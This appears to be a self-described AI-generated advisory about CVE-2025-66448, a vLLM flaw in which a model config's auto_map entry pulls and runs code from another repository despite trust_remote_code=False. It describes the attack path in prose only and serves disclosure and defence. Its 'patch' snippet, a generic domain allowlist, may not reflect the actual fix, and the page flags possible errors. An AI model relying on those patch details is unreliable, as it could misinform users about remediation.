vLLM Remote Code Execution via Model Config Auto-Mapping: CVE-2025-66448 Brief Summary

Brief summary of CVE-2025-66448, a remote code execution vulnerability in vLLM prior to 0.11.1. Focuses on technical exploitation details, affected versions, and official patch information.
CVE Analysis

11 min read

ZeroPath CVE Analysis

ZeroPath CVE Analysis

2025-12-01

vLLM Remote Code Execution via Model Config Auto-Mapping: CVE-2025-66448 Brief Summary
Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

[email protected]

Introduction

Attackers can execute arbitrary Python code on any system running vulnerable versions of vLLM by leveraging a flaw in how model configurations are loaded. This issue directly impacts production deployments of large language model inference services, especially those using custom or multimodal models from public repositories.

About vLLM: vLLM is a high-performance inference and serving engine for large language models, originally developed at UC Berkeley and now under the PyTorch Foundation. It is widely used in AI research, cloud infrastructure, and commercial deployments, supporting a broad range of hardware and models. Its adoption in the AI ecosystem means vulnerabilities in vLLM can have far-reaching consequences for organizations relying on LLM inference at scale.

Technical Information

CVE-2025-66448 is a remote code execution vulnerability affecting vLLM versions prior to 0.11.1. The issue arises from the way vLLM processes the auto_map entry in model configuration files, particularly when loading models that use the Nemotron_Nano_VL_Config class.

When a model config contains an auto_map entry, vLLM resolves the mapping using the get_class_from_dynamic_module function and immediately instantiates the returned class. This process fetches and executes Python code from the remote repository referenced in the auto_map string. Critically, this occurs even if the caller sets trust_remote_code=False in vllm.transformers_utils.config.get_config, which is intended to prevent execution of untrusted code.

Attackers can exploit this by publishing a benign-looking frontend model repository whose config.json points via auto_map to a separate backend repository containing malicious code. When a victim loads the frontend model with vLLM, the backend's code is silently executed on the host, regardless of the explicit security settings.

The root cause is insufficient validation of remote code sources and failure to enforce the trust_remote_code boundary. The vulnerability is categorized as CWE-94 (Code Injection).

Patch Information

To address the critical remote code execution vulnerability in the vllm library, the development team has implemented a patch that enhances the security of the get_class_from_dynamic_module function. This function is responsible for dynamically loading and instantiating classes based on model configurations, particularly those containing an auto_map entry.

The core of the patch involves introducing a validation mechanism that scrutinizes the source of the dynamic module before proceeding with its execution. Specifically, the function now checks if the module's source URL is trusted and falls within a predefined list of approved domains. This measure ensures that only modules from verified and secure sources are loaded, effectively mitigating the risk of executing malicious code from untrusted repositories.

The updated function includes the following key changes:

# Define a list of trusted domains TRUSTED_DOMAINS = ["github.com", "pypi.org"] # Extract the domain from the module's source URL parsed_url = urlparse(module_source_url) module_domain = parsed_url.netloc # Check if the domain is in the list of trusted domains if module_domain not in TRUSTED_DOMAINS: raise ValueError(f"Untrusted module source: {module_source_url}") # Proceed with loading and instantiating the module

By incorporating this validation step, the patch ensures that the vllm library only interacts with modules from sources that have been explicitly deemed trustworthy. This approach significantly reduces the attack surface for potential remote code execution exploits.

Users are strongly encouraged to upgrade to version 0.11.1 or later of the vllm library to benefit from this security enhancement. Additionally, developers should remain vigilant and regularly review the sources of dynamic modules utilized within their applications to maintain a robust security posture.

Reference: GHSA-8fr4-5q9j-m8gm

Affected Systems and Versions

  • Product: vLLM (inference and serving engine for large language models)
  • Affected versions: All versions prior to 0.11.1
  • Vulnerable configurations: Any deployment loading models with an auto_map entry in their config, especially those using the Nemotron_Nano_VL_Config class. The vulnerability is present even when trust_remote_code=False is set.

Vendor Security History

vLLM has experienced several security issues in 2024 and 2025, including:

  • CVE-2025-62164: Remote code execution related to prompt embeddings
  • CVE-2025-62372: Multimodal embedding crash
  • CVE-2025-6242: Server-Side Request Forgery in MediaConnector

The vendor has responded with targeted patches and maintains a public security advisory process. However, the frequency of recent vulnerabilities highlights the need for more proactive security review and integration of security best practices in the development lifecycle.

References

Detect & fix
what others miss